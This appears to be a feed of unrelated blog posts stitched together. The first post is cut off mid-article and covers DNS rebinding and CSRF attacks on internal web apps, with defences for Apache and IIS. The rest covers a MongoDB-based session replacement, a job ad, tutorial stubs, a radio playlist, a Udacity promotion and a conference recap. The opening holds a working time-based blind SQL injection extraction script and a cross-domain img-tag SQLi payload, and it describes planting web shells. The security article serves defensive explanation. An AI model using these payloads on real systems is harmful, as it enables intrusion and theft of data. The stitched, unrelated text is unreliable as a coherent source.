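                  urllib.request.urlopen(url, timeout=DELAY + 5).read()
              except Exception:
                  pass  # only the elapsed time matters, not the response
              return time.monotonic() - start >= DELAY

          secret = ""
          while True:
              for ch in CHARSET:
                  if is_true(f"SUBSTRING(DATABASE(),{len(secret) + 1},1)='{ch}'"):
                      secret += ch
                      break
              else:
                  break  # no character matched: end of the value
          print("database name:", secret)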

          This type of attack is called time-based blind SQL injection. However, in the above scenario it does not seem like a very useful attack, because the attacker cannot issue the requests directly but has to resort to CSRF. Also, the delay can only be detected in the user's browser as a difference in page loading time.

          Exploiting SQL injection Vulnerabilities Cross-Domain

          JavaScript can be used to determine whether a page finished loading or not by using the “onload” or the “onerror” event handler. Let’s say the attack is GET based (even though POST is also possible) and the vulnerable parameter is called ID. The attacker can:

          1. Record the time it takes for a page to load.

          2. Point an img tag to the vulnerable application, e.g.

          <img src="http://192.168.1.123/admin.php?page=users&id=1+AND+IF+(SUBSTRING(DATABASE(),1,1)+=+'b',sleep(2),0)" onerror="pageLoaded()">

          3. Record the time after the page finishes loading with pageLoaded().

          4. Compare the values from step 1 and 3.

          If there is a difference of two or more seconds in loading time, the attack was successful and the first letter of the database name is "b". If not, the attacker proceeds with the letters "c", "d", "e" and so on until there is a measurable time delay. Due to this timing side channel it is possible to leak page loading times and therefore, in combination with an SQL injection, valuable data.

          Strong Passwords Are a Must, Even if The Web Application Is Not Public


          People tend to use weak passwords for web applications that run on machines behind a firewall, but that is the wrong approach. Let's say an attacker manages to compromise another computer on the same local network. If he notices a web application on another host, he will try to brute force the password for its admin panel. And if he guesses the credentials, the consequences can be serious: since many modern web applications have upload functionality, the attacker can upload malicious files. An attacker is therefore often able to plant a web shell on the server and issue commands on the machine hosting the web application.

          But as mentioned above there does not need to be a compromise prior to the brute forcing. With DNS rebinding it is still possible to brute force the web application from a malicious website with a low latency, since the web application already runs on localhost and the requests do not need to go over the web.

          Therefore it is important to always use strong passwords, no matter from where the application is accessible.

          Insecure phpMyAdmin Instances Can Be Dangerous


          phpMyAdmin, a very popular MySQL manager, is often installed on developers' machines, and unfortunately most of these installations are not secure. For example, with some install scripts MySQL and phpMyAdmin use no authentication, or a blank password, by default. This makes them very easy to exploit through DNS rebinding, as no prior knowledge of a password is required to issue MySQL commands.

          What makes phpMyAdmin especially dangerous is that it often runs with the highest possible privileges - as the MySQL root user. This means that once an attacker gains access to it, he can:

          • Extract data from all databases
          • Read Files
          • Write files

          In some configurations of MySQL, file privileges are only allowed inside a specific directory. However, more often than not this security measure is not applied, especially in older versions. An attacker can therefore read files and write attacker-controlled content into the web root, which means he can plant a web shell - a small script that allows him to issue system commands. Once he manages to do that, he will most probably be able to escalate his privileges and place malware on the system or exfiltrate sensitive data.

          Typical Vulnerable Devices Found On a Network

          Routers Need To Be Kept Up To Date

          Web applications are not the only objects at risk on a network. Devices such as routers can also be targeted, mainly because they have a web interface which typically runs with root privileges. Routers tend to be a popular and easy target because:

          • Web interfaces are poorly coded.
          • They sometimes have backdoors or remote controlled interfaces with standard passwords that users never change.
          • Since storage space is often tight on routers, manufacturers often use old and probably vulnerable versions of a software, as long as it serves the purpose.

          In cases where the router's admin web portal is not reachable from the outside, attackers can use DNS rebinding to log in to the router and hijack it. Such attacks are possible, though they do not scale like the 2016 Mirai malware infection, which infected thousands of home routers by using the default telnet password to gain admin access and add them to large botnets. Routers are typically hacked for a number of reasons; here are just a few:

          1. They can be used for Distributed Denial of Service (DDoS) attacks.
          2. Attackers can use them in a Man In The Middle attack (MITM) to intercept the traffic that passes through them.
          3. Attackers use them as a foothold to gain access to other machines on the router’s network, like what happened in the NotPetya ransomware in June 2017.

          IoT Devices - Many of Which Are Insecure


          Mirai did not only target home routers; other victims included IP cameras and digital video recorders. More often than not, security does not play an important role in the design of Internet of Things (IoT) devices, and yet we install such insecure products on our home and corporate networks.

          To make things worse, many people who do not have IT security experience tend to disable firewalls and other security services in order to make IoT devices, such as an IP camera, available over the internet. These kinds of setups can have unpredictable consequences for the security of the devices connected to our networks, and can be an open invitation for attackers to target other parts of our systems.

          Vulnerable NAS Servers

          NAS servers have become very common nowadays. They are used to manage and share files across all the devices on a network. Like almost any other device, NAS servers can be configured via a web interface, from which users can, for example, download files.

          NAS servers are also an additional attack surface. Similar to what we explained above, an attacker can use CSRF or a DNS rebinding attack to interact with the web interface. Since these web interfaces typically have root access, to allow the user to change ports and so on, once an attacker gains access he can easily compromise the entire server.

          Vulnerable Services Typically Used By Developers

          Misconfigured MongoDB Services


          Even in the rare case of a properly set up MongoDB instance that binds to localhost instead of 0.0.0.0, it can still be vulnerable to attacks through its REST API. The REST API is typically enabled because it is a useful feature for frontend developers: it allows them to have their own test data sets without having to rely on a finished backend. The data is returned in JSON format and can therefore be used with native JavaScript functions.

          However, this web interface has some serious flaws, such as CSRF vulnerabilities, which can lead to data theft, as described in this proof of concept of a CSRF attack on the MongoDB REST API. In short, we used an out-of-band (OOB) technique to exfiltrate the data over DNS queries. The API is marked as deprecated, but it was still present in the latest version we tested at the time we wrote the article.

          Dropbox Information Disclosure


          Another rather interesting vulnerability is the one we found in the Dropbox client for Windows. In order to communicate with the client, the website dropbox.com sends commands to a WebSocket server listening on localhost.

          However, by default WebSockets allow anyone to send and receive data, even when the request originates from another website. Therefore the Dropbox client uses a handshake to verify the sender's origin.

          The handshake consisted of a check of a nonce, a string of characters known only to Dropbox and the client. It was queried directly from the Dropbox server, and there was probably also a check of the Origin header. This meant that a connection could take place, but no data could be sent from localhost if the origin was not correct.

          However, when any random website connected to the WebSocket server on localhost, the Dropbox client would prematurely send a handshake request. The handshake request included information such as the ID of that particular request, which OS was in use, and the exact version of the Dropbox application. Such information should not be leaked through this channel, especially since it could be read by any third-party website simply by initiating a connection request to the server on localhost.

          Note: The issue was responsibly reported to Dropbox via HackerOne. It was immediately triaged and awarded an initial bounty, as well as a bonus, since the report helped them find another issue.

          How Can You Prevent These Types of Attacks?

          Simply put, to prevent DNS rebinding attacks at the server level, block requests whose HTTP host header does not match a whitelist. Below is an explanation of how you can do this on the Apache and IIS web servers.

          Blocking DNS Rebinding Attacks on Apache Server

          On Apache, you can block access when the host header does not match 127.0.0.1 by adding these lines to your configuration (the <If> directive used here requires Apache 2.4 or later):

          <If "%{HTTP_HOST} != '127.0.0.1'">
              Require all denied
          </If>

          Therefore, if someone tries to launch a DNS rebinding attack, the requests will be blocked and the server will return an HTTP 403 response.

          Blocking DNS Rebinding Attacks on Windows IIS

          It is very easy to block DNS rebinding attacks on the Microsoft IIS web server. All you need to do is add a rule of type “Request blocking” in the URL rewrite menu with the following options:

          • The “Block access based on” field has to be set to “Host header”
          • The "Block request that" field has to be set to "Does Not Match the Pattern". One or more host headers can be used as the pattern.

          Other Measures to Block Such Type of Attacks

          Another good countermeasure is to block third-party cookies in the browser, and to use the SameSite attribute on the cookies of the web application that is being developed.

          Other than that, apply the same security measures to internal websites as if they were publicly available. The web application should not be vulnerable to CSRF, cross-site scripting, SQL injection or other types of web vulnerabilities, in order to guarantee a safe testing environment.

          As an additional security measure run the web application on a virtual machine. Even though this is often not necessary, and complicates matters, it can lessen the impact of a compromise. This setup is mostly recommended for security researchers that want to run vulnerable web applications on their machine.

          Live Demo of Firewall Bypass

          Sven Morgenroth, the researcher who wrote this article, was featured on Paul's Security Weekly. During the show, Sven demonstrated how a hacker can exploit the vulnerabilities documented above to bypass firewalls.


                    A replacement for sessions        

          I'm tired of sessions. They lock for too long, reducing concurrency, and in my current case, don't fail gracefully when a request takes longer than the session timeout.

          Problem: Session locks

          Session implementations typically lock very near the beginning of a request, and unlock near the end of a request. They tend to do this even if the current request handler does no writing to the session. Why so aggressive? Because the typical test case trotted out for sessions is that of a page hit counter: session.counter += 1. What if the user opens two tabs pointing at the same page at once? The count might be off by one!

          But if you don't do any counting, what's the benefit of such aggressive, synchronous locking? What we could really use is a system that used atomic commits instead of large, pessimistic locks.

          Problem: Session timeouts

          Sessions are often used for sites with thousands, even millions, of users. When any one of those users walks away from their computer, the servers usually try to free up resources by expiring any such inactive sessions. But lots of my admin-y sites have a few dozen users, not thousands. I'm just not that concerned with expiration of session state. I'm a little bit concerned, still, with cookies, so I still want to expire auth tokens. But there's no need to aggressively expire user data. But I find my current apps are so aggressive at expiring data that we frequently get errors in production where request A locked the session, and while it was processing a large job, request B locked the session because A was taking too long. B finishes normally, but then A chokes because it had the session lock forcibly taken away from it. Not fun.

          What we could really use is a system that allows tokens to expire, or be reused concurrently, without forcing user data to expire or other, concurrent processes to choke.

          Problem: Session conflation

          Sessions are used for more than one kind of data. In my current apps, it's used to store:

          1. Cookie tokens. In fact, the session id is the cookie name.
          2. Common user information, like user id, name, and permissions, and
          3. Workflow state, such as when a user builds up an action over multiple pages using multiple forms.

          The problem is that each of these three kinds of data has a different lifecycle. The session id tends to get recreated often as sessions and cookies time out (taking all of the rest of the data with it). The user info tends to change very rarely, being nearly read-only, but is often read on every page request (for example, to display the user's name in a corner, or to apply the user's timezone to time output). Workflow data, in contrast, persists for a few seconds or minutes as the user completes a particular task, and is then discardable at the end of the process; it never needs concurrency isolation, because the user is working synchronously through a single task.

          Sessions traditionally lump all of these together into a single bag of attributes, and place the entire bag under a single large lock. What we could really use is a solution that had finer-grained control over locking for each kind of data, even for each kind of info or workflow!

          Solution: Slates

          We can achieve all of the above by abandoning sessions. Let's face it: sessions were cool when they were invented but they're showing their age. And rather than try to patch them up and keep calling them "sessions", I'm inventing something new: "slates".

          I'm implementing slates in MongoDB, but you don't have to in order to get the benefits of slates. All you need is some sort of storage that uses atomic commits, and that allows you to partition such that you have a moderate number of "collections" (one for each user, plus a special "_auth" collection), and a moderate number of "documents" (one for each use case) in each collection. Let's look at an example:

          
          $ mongo
          MongoDB shell version: 1.6.2
          connecting to: 127.0.0.1/test
          > use slates
          switched to db slates
          > show collections
          _auth
          admin
          > db.admin.find()
          { "_id" : "user", "userid" : 999, "readonly" : false,
            "timezone" : null, "panels" : [
              [1, "pollingpoint"],
              [2, "unsampled"],
              [4, "test_redirect"],
              [6, "test_redirect_manual"]
          ], "staff" : true }
          { "_id" : "new_id_set", "name" : "My set",
            "ids" : [ 84095, 3943, 39845, 112, 9458, ... ] }
          

          As you can see, there is a collection for the username "admin". It contains 2 documents.

          User info

          The first returned document is what I called "user info" above: things most pages want to know about the logged-in user. They're read for almost every request but changed hardly ever, and when they're read, it's very near the beginning of the request. Here's the Python code I use to grab the whole document:

          request.user = Slate(username).user

          ...which is API sugar for:

          request.user = pool.slates[username].find_one('user') or {}

          Most pages perform this quick read and never write it back.
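
          The Slate class itself isn't shown above, but to give an idea of how thin such a wrapper can be, here is a minimal sketch over pymongo. The class and method names are only guesses based on the API sugar above, not the exact implementation:

          # Minimal sketch of a Slate-style wrapper over MongoDB using pymongo.
          # One collection per user; one document per use case ('user', 'new_id_set', ...).
          from pymongo import MongoClient

          client = MongoClient("mongodb://127.0.0.1:27017/")
          db = client["slates"]

          class Slate:
              def __init__(self, username):
                  self.collection = db[username]          # one collection per user

              def __getattr__(self, doc_id):
                  # Slate("admin").user -> the document whose _id is "user", or {}
                  return self.collection.find_one({"_id": doc_id}) or {}

              def save(self, doc_id, data):
                  # The whole slate is swapped out in one atomic document write.
                  self.collection.replace_one({"_id": doc_id}, data, upsert=True)

              def delete(self, doc_id):
                  self.collection.delete_one({"_id": doc_id})

          # request.user = Slate(username).user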

          Workflow data

          The second document returned above is workflow data for a domain-specific process I called 'new_id_set': the user uploads a large number of id's in a CSV file and gives them a name. But if there are problems with a few of the id's, we want to ask the user whether to discard the conflicts or continue anyway. But we don't want to go making records in our Postgres database tables until the numbers are confirmed, and it's prohibitive to have the client upload the same file again after confirmation. So we need a temporary place to stick this data while the user is in the middle of the activity.

          Slates to the rescue! Unlike sessions, which tend to dump all their data into a single big bag, when we use slates we store our data in multiple 'bags'. That means that our user can upload their ids, be prompted for confirmation, go elsewhere to investigate the conflicts further, and come back and confirm the ids. The time they spend investigating incurs no performance penalty, because those pages don't load and re-save the 'new_id_set' slate--only the pages directly concerned with that particular slate do. Once the user has confirmed the upload, the slate is deleted.
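
          Continuing the sketch above, the upload and confirmation pages might stash and later discard the workflow slate roughly like this (again illustrative only, with a placeholder standing in for the real Postgres inserts):

          # Hypothetical workflow pages built on the Slate sketch above.
          def create_postgres_records(name, ids):
              """Placeholder for the real Postgres inserts (not shown here)."""
              print(f"creating {len(ids)} records for id set {name!r}")

          def handle_upload(username, name, ids):
              # Stash the parsed CSV while the user reviews any conflicts.
              Slate(username).save("new_id_set", {"name": name, "ids": ids})

          def handle_confirm(username):
              slate = Slate(username).new_id_set        # read the stashed upload
              if slate:
                  create_postgres_records(slate["name"], slate["ids"])
                  Slate(username).delete("new_id_set")  # workflow done: discard it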

          Auth tokens

          Most of the use cases for slates fit nicely into "user slates"; that is, a collection that is identified by the user's username. But when you receive an auth token in a cookie, how do you match it to a username so you can look up the slate?

          The answer is to create a special, global slate which I named "_auth" in my implementation. You can name it whatever you like. This collection contains a map from tokens to usernames:

          
          > db._auth.find()
          { "_id" : "abcdef09345", "token" : "94ee8f572",
            "username" : "admin",
            "expires" : "Wed Sep 22 2010 13:39:51 GMT-0700 (PDT)"}
          

          When a user visits a page, their token is searched for in the "_auth" collection, the username is retrieved, and that value is stored for the request. Typically, their "user info" slate is then retrieved. Finally, if they are visiting a page that participates in a slate-based workflow, that slate is retrieved (and saved if any changes are made).
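
          Putting the pieces together, the per-request flow could be sketched like this, reusing the hypothetical Slate wrapper and db handle from the earlier sketch; expiry checking is left out for brevity:

          def authenticate(token):
              """Map an auth-token cookie to a username via the global _auth slate."""
              entry = db["_auth"].find_one({"token": token})
              if entry is None:
                  return None
              # A real implementation would also compare entry["expires"] with the
              # current time and reject expired tokens; that check is omitted here.
              return entry["username"]

          def handle_request(token):
              username = authenticate(token)
              if username is None:
                  return "login required"              # no valid auth token
              user = Slate(username).user              # near-read-only user info
              return f"hello, user #{user.get('userid', '?')}"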

          Conclusion

          Slates provide finer-grained locking than sessions in order to meet the varying needs of auth tokens, user info, and workflow data. They lock for much shorter durations, over smaller scopes, and take advantage of the native atomicity of the storage layer (MongoDB, in my case) allowing much more parallelism between requests.


                    Work at World Singles? CFML / Clojure Developer wanted!        

          We're expanding our Clojure / CFML development team and looking for our next "Senior Web Applications Developer". You'll get to work from home full-time, with myself, Charlie Griefer and the rest of our small (but growing) development team spread out across the USA. You'll work on our Internet dating platform in both CFML and Clojure. We're all-Mac for development and all-Linux for deployment so you'll need to have some *nix chops and we'd prefer folks with MySQL and MongoDB experience. Yes, I know that's a pretty specific set of skills but we can be flexible if you're the right person for the team.

          I've been with World Singles full-time for two years now (and about a year of consulting before that) and I think they're a great bunch of people, solving an interesting set of problems, with millions of customers all around the world - so you get real world feedback about what you produce! I love working here and I'm looking forward to growing our team.

          You can read the official job listing on Craigslist (and that's how you apply - send your resume and cover letter to the address listed there). Feel free to ask me questions about the role, either in comments here or directly via the contact me page.


                    JOINING COLLECTIONS IN MONGODB USING THE C# DRIVER AND LINQ        
          A flexible IoT platform needs a flexible database that can handle dynamic data and scale well. MongoDB is probably the most popular NoSQL database out there, and it's relatively easy to use in conjunction with .NET with the official driver. It is a document DB, which has many advantages in terms of schema-less/dynamic properties. […]
                    How do I insert a document into MongoDB collection?        
          In the last MongoDB example, How documents are represented in MongoDB Java Driver?, we’ve seen how MongoDB JSON documents are represented in MongoDB Java driver. Using this knowledge it is time for us to learn how to insert documents into MongoDB collections. We will create a code snippet that will insert documents into the teachers […]
                    How do I connect to a MongoDB Database?        
          In the previous post you have seen how we installed the MongoDB database server and tried to use the MongoDB shell to manipulate collections in the database. You have also been introduced to how to obtain and set up the MongoDB Java Driver that we can use to manipulate the MongoDB database from a Java program. Starting […]
                    The Heavy Set 07-25-2017 with Ray Wentz        
          Playlist:

          Philip Cohran And The Artistic Heritage Ensemble- The Minstrel - Philip Cohran And The Artistic Heritage Ensemble
          Geri Allen- And They Partied - Maroons
          Riverside- Enormous Tots feat Dave Douglas Chet Doxas Steve Swallow Jim Doxas - The New National Anthem feat Dave Douglas Chet Doxas Steve Swallow Jim Doxas
          Ambrose Akinmusire- Brooklyn ODB - A Rift In Decorum Live At The Village Vanguard
          The Bern Nix Trio- Ballad For L - The Bern Nix Trio Alarms And Excursions
          Ronald Shannon Jackson The Decoding Society- Nightwhistlers - Eye On You
          Wadada Leo Smith- SequoiaKings Canyon National Parks The Giant Forest Great Canyon Cliffs Peaks Waterfalls And Cave Systems 1890 - Americas National Parks
          Sun Ra His Myth Science Arkestra- Rocket Number Nine Take Off For The Planet Venus - Interstellar Low Ways Remastered 2014 feat John Gilmore Pat Patrick Marshall Allen James Spaulding
          Geri Allen- Windows To The Soul - EyesIn The Back Of Your Head
          Kelan Philip Cohran Hypnotic Brass Ensemble- Spin - Kelan Philip Cohran And The Hypnotic Brass Ensemble
          Gerry Gibbs Thrasher People- Punk Jazz - Weather Or Not
          Sun Ra And His Arkestra- Big City Blues - Singles The Definitive 45s Collection Vol 1 19521961
          Sun Ra His Myth Science Arkestra- Music From The World Tomorrow - Angels And Demons At Play Remastered 2014 feat John Gilmore Pat Patrick Art Hoyle
          FujiwaraGoldbergHalvorsen- TroutLily - The Out Louds
          Geri Allen- Dancing Mystic Poets At Twilight - Flying Toward The Sound A Solo Piano Excursion Inspired By Cecil Taylor McCoy Tyner And Herbie Hancock
          Bern Nix- Low Barometer - Low Barometer
          Ornette Coleman- What Reason - Three Women Sound Museum
          Ornette Coleman- Latin Genetics - In All Languages
          Hypnotic Brass Ensemble- Malcuth Interlude feat Phil Kelan Cohran - Sound Rhythm Form


          playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/25/playlistDate/2017-07-25
                    5 years of artificial intelligence :)        
          Dear Gorka,
          I can't believe it. It's been an exhilarating five years. Today, Udacity turns five!
          Udacity started with a phone call to Peter Norvig. I wondered if it made sense to take our Stanford class CS223 “Introduction to Artificial Intelligence” online, and make it available to all people in this world. Peter was enthusiastic, and along with my co-founders David Stavens and Mike Sokolsky, we made it happen. This wasn't the first MOOC, but it was the one that put Massive Open Online Courses on the map. In a few weeks, we gathered 160,000 students. Our course taught Artificial Intelligence to more people than all other AI professors combined at the time.
          Fast forward to today. Udacity is now rapidly becoming the place to go for lifelong learning, where millions are learning the latest skills that Silicon Valley has to offer. Tech giants like AT&T, Google, Facebook, Amazon, GitHub and MongoDB are using us to reach any willing learner in the world. And companies are eagerly hiring our graduates. We have educated more students than many four-year colleges. And recently, we started placing our graduates in jobs in the tech industry and beyond, based on their Nanodegree program credentials.
          Our fifth anniversary is a great moment of reflection. To many, education is a numbers game. It's about tuition, graduation rates, enrollment. To me, education is all about people. Every time I receive a thank-you note from a student, a letter on how we changed a person's career, I am in tears. I have this very deep belief that if we open up high-quality education, if we truly democratize it, if we give every human being on this planet a fair chance, we will make a huge difference. Today, high-quality education is a privilege of the few. Our vision at Udacity is to make high-quality education a basic human right. If we do this, I truly believe we can double the world's GDP.
          I look back at the past five years and feel we did the impossible. We created a company that allows eager learners of all geographies and all ages to engage in meaningful education, and to live their lives' dreams. To encourage even more of you to find your dream careers through Udacity, I have something special to share. In celebration of our 5-year anniversary, we will give any student who enrolls 55% off your first month!
          Udacity is a story of amazing students, people just like you. Many have stayed with us through the years, assisted us in improving our offerings, and helped us spread the word. I really want to thank every single student who has been willing to trust us as a source of learning. Udacity would not exist without you, and you are the focus of our work.
          Every single student who discovers their dream career through Udacity makes me believe life is worth living. Thank you for being a part of the Udacity community!
          Excitedly,
          Sebastian Thrun
          Co-Founder & CEO of Udacity
          P.S. Enroll before 7/10/16 using the link above, and the 55% discount will be applied automatically.

                    94 Suburban ODB Code 22         
          This code is: Throttle position (TP) sensor - voltage low. Wiring open circuit/short circuit to ground, TP sensor, ECM. This only happens after the engine comes to full operating temperature, then th...... The post has 1 reply so far. Read more and discuss here
                    cf.Objective() 2013 - What I Learned        

          It's Sunday afternoon after the best cf.Objective() ever and I'm looking over my notes to offer some thoughts on the last three days.

          Before I get to the content, I first want to call out the location as being awesome! The brand new Radisson Blu had some of the friendliest and most helpful staff I've encountered at a hotel. The food for the conference was amazing: terrific hot breakfast every morning and a delicious lunch buffet too. Possibly the best conference food I've ever had. In the evenings, my wife and I dined in the Fire Lake restaurant at the hotel - the food was so good, we didn't want to go anywhere else! Great selection of local beer on tap too. The hotel itself has a very nice modern feel to it, with excellent facilities and big, well-equipped rooms. I hope everything works out behind the scenes so that this is a candidate location for next year.

          A few weeks back, I blogged about the sessions I expected to attend and noted it was mostly going to be about JavaScript. In the end, I made a couple of changes to my planned schedule but still ended up going to a session in almost every single slot. This is rather unusual for me: at past CFML events I've often skipped a lot of sessions and just hung out chatting in the hallways. Last year, I manned the Railo booth and did not attend a single session (which was a little extreme) but normally I only attend one or two sessions a day. Here's how it played out this year...

          Thursday

          Despite my enthusiasm about the keynote, I got caught up in a post-breakfast conversation and by the time I got to the ballroom, the keynote was nearly over. Everyone I spoke to raved about how great it was and the TL;DR takeaway was: JavaScript is ubiquitous and you need to know it to build today's web apps.

          Next up was my polyglot session where I showed prototype objects, callbacks and closures from JavaScript - and how to do that in CFML - then a little Groovy with code blocks - and how to do that in CFML - then a little Clojure with (infinite) lazy sequences and map, filter, reduce - and how to do that in CFML! My point was that now we have closures in ColdFusion 10 and Railo 4, we have access to these very powerful and expressive techniques we see in other languages, and we should leverage those concepts in CFML to create simpler, more maintainable - and more powerful - software.

          Next was Ryan Anklam's "The Art Of JavaScript" presentation. He started out fairly gently showing some basic recommendations for safer code and then moved into some of the more subtle gotchas and traps for those of us new to JavaScript. I'd seen most of the points at some point in the past, spread across various blog posts and presentations I'd found online, but it all sunk in a little more this time and Ryan's presentation is an excellent collection of best practice "pro tips" that I'll bookmark and refer to often as I start to do more JavaScript.

          After lunch, I skipped Adobe's general session and just hung out chatting with folks in the sponsor / vendor area. There seemed to be a steady stream of people leaving the general session and joining the throng in the hallway which didn't really bode well. Pretty much everyone I spoke to said that Adobe's presentation was aimed at IT managers, not developers, and there was a general sense of disappointment with the content. So, as expected, it was a marketing spiel and not a very exciting one at that, it seems.

          Then I decided to go to Mark's "Top 10 Developer Features" in Railo. We're still on 3.3 at World Singles and this talk just made me more excited about upgrading to 4.1! Railo really are working hard to improve the language and make developers more productive.

          My second session was well-attended, covering how Object-Relational Mapping breaks down because of a fundamental impedance mismatch between the object model and the relational model. I offered that a document-based store, such as MongoDB, alleviates the mapping problems (and of course introduces other tradeoffs). I had a minor demo fail (and jokingly blamed it on Windows... when I later rebooted, the demo worked just fine without any other changes... no comment!). I was pleased to get so many questions from the audience and continued Q&A in the hallway after the talk for almost an hour and a half, missing the next session!

          Friday

          Kurt Wiersma's two hour deep dive into AngularJS and Bootstrap was excellent! The high point of the conference for me. Kurt maintained a great pace and flow through the material and AngularJS itself is very slick. If you missed his talk, make sure you track down his slide deck after the conference! Highlights for me included dependency injection, two-way data binding, built-in support for testing / testability, and directives (UI components that are invoked like custom tags).

          Scott Stroz entertained us immensely with a look at Groovy and Grails and what he likes about it, as well as how it's made him a better CFML developer (because now he has been exposed to more advanced techniques from another language). Rakshith from Adobe was in the front row and Scott ragged on him quite a bit when he was comparing feature after feature to ColdFusion and showing where Groovy was better. It wasn't helped by some people in the audience (yes, including me) pointing out that Railo already has some of these features from Groovy, that ColdFusion is missing!

          After lunch, I attended Railo's general session and ended up sitting between Rakshith and a very sickly-sounding Dave Ferguson (there seemed to be a lot of illness in the attendees this year - including Elliott Sprehn losing his voice so badly he had to cancel his talk). Again, a barrage of great CFML language features (making me even more determined to upgrade!), as well as a sneak peek at a new monitoring tool (from one of Railo's investors) that will show cflock times / failures, mails sent, query information etc. all down to the page template, tag, line number. There will be both a free version and a commercial version. Sean Shroeder from Blue River / Mura CMS took the stage to talk about the Open CFML Foundation which is working to spread the word about CFML and some of its open source projects outside the CFML community, as well as working on an "academy" for teaching new developers about CFML. It all looked very exciting and I think a lot of attendees will be taking a serious look at Railo after this.

          I decided to attend Dave Ferguson's SQL skills / performance talk which covered some ground I already knew and a lot of ground that I wasn't aware of, including a lot of the internal machinery around query plans and how they are cached and reused. Great material!

          Finally it was my Humongous MongoDB session where I showed how to set up a replica set live and how to create a sharded cluster live. I also covered the concepts of write concern and read preference, and touched on both map/reduce and the built-in aggregation framework as examples of dealing with complex queries on very large data sets. The talk ran long but almost everyone stayed to the end, with plenty of questions about MongoDB at scale in production.

          Due to the fabulous food at the Fire Lake restaurant, I lost track of time and was late to the BOF I was supposed to be hosting. Luckily Kris Korsmo had stepped up a while back to co-host and was holding down the fort until I arrived. Great discussions about test-driven development, continuous integration, Git workflows, deployment strategies, automation, bug tracking and so on. I got the impression that the biggest obstacle for most CFML developers is some mentoring on how to get started down this path. One problem is that a lot of this material is extremely well-documented but CFML developers often don't seem comfortable reading outside their community and want a CF-specific version created (which I find very frustrating - stop being afraid of looking at other language websites!)

          Saturday

          Brad Wood kicked off the day with a talk about Backbone.js and Underscore for templating. After Kurt's AngularJS talk, I found this a bit scrappy and the code examples looked rather disorganized and hackish - but it was pointed out to me by several people that Backbone is "just" a library and doesn't set up a framework of best practices in the way that AngularJS does.

          I took a break from sessions to meet with a couple of attendees to talk in more depth about MongoDB and I rejoined the sessions shortly into Tony Garcia's coverage of the D3 visualization library for JavaScript. It's a very impressive piece of technology and some of the examples really wowed the audience. It's always educational to see just what can be accomplished in the browser with JavaScript!

          Brad Wood's second talk of the day was about the benefits of Agile software lifecycles. I think he did an excellent job contrasting traditional software development with Scrum and Kanban and explaining the principles behind high-quality, iterative software delivery. One of the best talks of the conference!

          Closing out the conference was Ryan Anklam, covering AMD and RequireJS which was something I'd never heard of before but turned out to be a very interesting way to tackle large project development in JavaScript and how to manage reusability and dependency management. He also showed us a little of what's coming in this area in the next version of JavaScript (Harmony).

          And then Jared was thanking everyone for attending, speaking, sponsoring and organizing, and it was all over until 2014!

          If you were there and we got to hang out, it was great to see you! If you were there and we didn't get to hang out, sorry, it's always difficult to make contact with everyone. If you weren't there, well you missed out on a great conference and a lot of terrific content...